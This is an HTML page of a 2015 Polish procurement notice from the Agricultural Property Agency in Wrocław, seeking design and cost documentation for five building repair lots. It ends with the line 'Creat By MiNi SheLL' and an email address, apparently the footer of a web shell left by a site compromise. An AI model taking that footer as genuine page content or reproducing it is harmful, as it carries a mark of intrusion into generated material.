<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 93</li>
<li>2 - Termin płatności faktury za wykonaną dokumentację - 7</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej: 1.Zmiana terminu realizacji przedmiotu umowy a)zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, tj. wstrzymanie realizacji przedmiotu umowy przez Zamawiającego, b)zmiany będące następstwem działania organów administracji w szczególności przekroczenie określonych przez prawo terminów wydania przez organy administracji decyzji zezwoleń itp., c)zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego. W przypadkach określonych w § 16 ust. 1, Zamawiający będzie miał prawo do wyznaczenia nowego terminu realizacji umowy odpowiedniego do zaistniałych okoliczności. 2.Zmiany Osobowe a)zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami o których mowa w ustawie Prawo budowlane lub innych uprawnieniach, b)zmiana koordynatora lub osób odpowiedzialnych za nadzór nad prawidłowym wykonywaniem zamówienia po stronie Zamawiającego. 3.Pozostałe Zmiany; a)siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ, b)zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego, umowy, zmiana adresu, itp.), 4.Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę, Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu 54-610 Wrocław, ul. Mińska 60.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2015 godzina 10:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu 54-610 Wrocław, ul. Mińska 60, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej remontu budynku wielorodzinnego w Szczawnie Zdroju przy ul. Baczyńskiego 1, zlokalizowanego na działce nr 604/2 obręb Szczawno Zdrój, wraz z uzyskaniem stosownych pozwoleń i pełnieniem funkcji nadzoru autorskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej remontu budynku wielorodzinnego w Szczawnie Zdroju przy ul. Baczyńskiego 1 (Dz. Nr 604/2 obręb Szczawno Zdrój), w zakresie remontu: dach budynku, elewacja, osuszenie i remont piwnic, malowanie klatki schodowej. Zamówienie obejmuje uzyskanie stosownych pozwoleń, pełnienie funkcji nadzoru autorskiego oraz uzyskanie niezbędnych opinii, decyzji i uzgodnień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury za wykonaną dokumentację - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie STWiOR, przedmiaru i kosztorysu dla realizacji rozbiórki budynku gospodarczego w Kopaczowie przy ul. Głównej 5 (Dz. Nr 261/5 obręb Kowaczów)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie Specyfikacji Technicznej Wykonania i Odbioru Robót, przedmiaru i kosztorysu dla realizacji rozbiórki budynku gospodarczego w Kopaczowie przy ul. Głównej 5 (Dz. Nr 261/5 obręb Kowaczów).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury za wykonaną dokumentację - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej związanej z usunięciem występujących nieprawidłowości w budynkach byłych obór położonych na terenie dz. nr 233/5 w Doboszowicach gm. Kamieniec Ząbkowicki, wraz z uzyskaniem stosownych pozwoleń i pełnieniem funkcji nadzoru autorskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane z usunięciem występujących nieprawidłowości w budynkach byłych obór położonych na terenie dz. nr 233/5 w Doboszowicach gm. Kamieniec Ząbkowicki w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z pełnieniem funkcji nadzoru autorskiego  

Zakres opracowania obejmuje projekt  budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski,, uzyskanie pozwolenia Wojewódzkiego Konserwatora Zabytków, niezbędnych opinii, uzgodnień, map oraz pełnienie nadzoru autorskiego.

Budynek byłej obory ( nr inw. 16470/006/182):
- wykonanie remontu drewnianej konstrukcji więźby dachowej
- wykonanie uzupełnienia lub wymiany pokrycia dachowego
- uzupełnienie obróbek blacharskich, rynien i rur spustowych
- trwałe zabezpieczenie otworów okiennych i drzwiowych 

Powierzchnia zabudowy- 402 m2
Powierzchnia dachu- 540 m2

Budynek byłej obory ( nr inw. 16469/005/182):
- wykonanie remontu drewnianej konstrukcji więźby dachowej
- wykonanie uzupełnienia lub wymiany pokrycia dachowego
- uzupełnienie obróbek blacharskich, rynien i rur spustowych
-zabezpieczenie ceglanych sklepień 
- trwałe zabezpieczenie otworów okiennych i drzwiowych 

Powierzchnia zabudowy- 472 m2
Powierzchnia dachu- 620 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury za wykonaną dokumentację - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej na roboty budowlane związane z usunięciem występujących nieprawidłowości w budynku mieszkalnym położonym na dz. nr 710/3 w Starczowie 111 gm. Kamieniec Ząbkowicki, wraz z uzyskaniem stosownych pozwoleń i pełnieniem funkcji nadzoru autorskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane z usunięciem występujących nieprawidłowości w budynku mieszkalnym położonym na dz. nr 710/3 w Starczowie 111 gm. Kamieniec Ząbkowicki w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z pełnieniem funkcji nadzoru autorskiego  

Zakres opracowania obejmuje projekt budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski, uzyskanie pozwolenia Wojewódzkiego Konserwatora Zabytków, niezbędnych opinii, uzgodnień, map oraz pełnienie nadzoru autorskiego.

Budynek mieszkalny 
- wykonanie izolacji budynku wraz z osuszeniem ścian
- uzupełnienie tynków zewnętrznych wraz z mapowaniem elewacji 
- wykonanie remontu konstrukcji więźby dachowej wraz z jej impregnacją 
- uszczelnienie pokrycia dachowego wraz z oczyszczeniem i pomalowaniem 
- uzupełnienie obróbek blacharskich 
-uzupełnienie tynków wewnętrznych 
- wymiana drzwi wejściowych do obiektu oraz okien na poddaszu
- naprawa podłogi drewnianej na poddaszu
- wykonanie prawidłowej (właściwej) wentylacji pomieszczeń 
- uzupełnienie tynków na ciągach kominowych
- naprawa instalacji odgromowej wraz z wymianą uziomów 

Powierzchnia zabudowy- 253,8 m2
Wysokość- 13,2 m
Kubatura - 1621,1 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury za wykonaną dokumentację - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej na remont i przebudowę 3 lokali mieszkalnych z wydzieleniem łazienki i wc wraz z niezbędną infrastrukturą i przyłączami w Świdnicy przy ul. Kliczkowskiej 28 d-e dz. nr 247, wraz z uzyskaniem stosownych pozwoleń i pełnieniem funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest wykonanie dokumentacji projektowo- kosztorysowej na remont i przebudowę 3 lokali mieszkalnych z wydzieleniem łazienki i wc oraz pomieszczeń gospodarczych wraz z niezbędną infrastrukturą i przyłączami w Świdnicy przy ul. Kliczkowskiej 28 d-e w uzgodnieniu z właściwą administracją architektoniczno- budowlaną wraz z pełnieniem funkcji nadzoru autorskiego  

Zakres opracowania obejmuje projekt  budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski, uzyskanie niezbędnych opinii, uzgodnień, map, prawomocnej decyzji pozwolenia na budowę oraz pełnienie nadzoru autorskiego


Budynek mieszkalny II piętro:
Lokal mieszkalny nr 1- powierzchnia ok 39 m2
Lokal mieszkalny nr 2- powierzchnia ok 34 m2
Lokal mieszkalny nr 3- powierzchnia ok 39 m2
Korytarz- powierzchnia ok 36 m2
Ubikacje z przeznaczeniem na 3 pomieszczenia gospodarcze- powierzchnia ok 15 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury za wykonaną dokumentację - 7</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com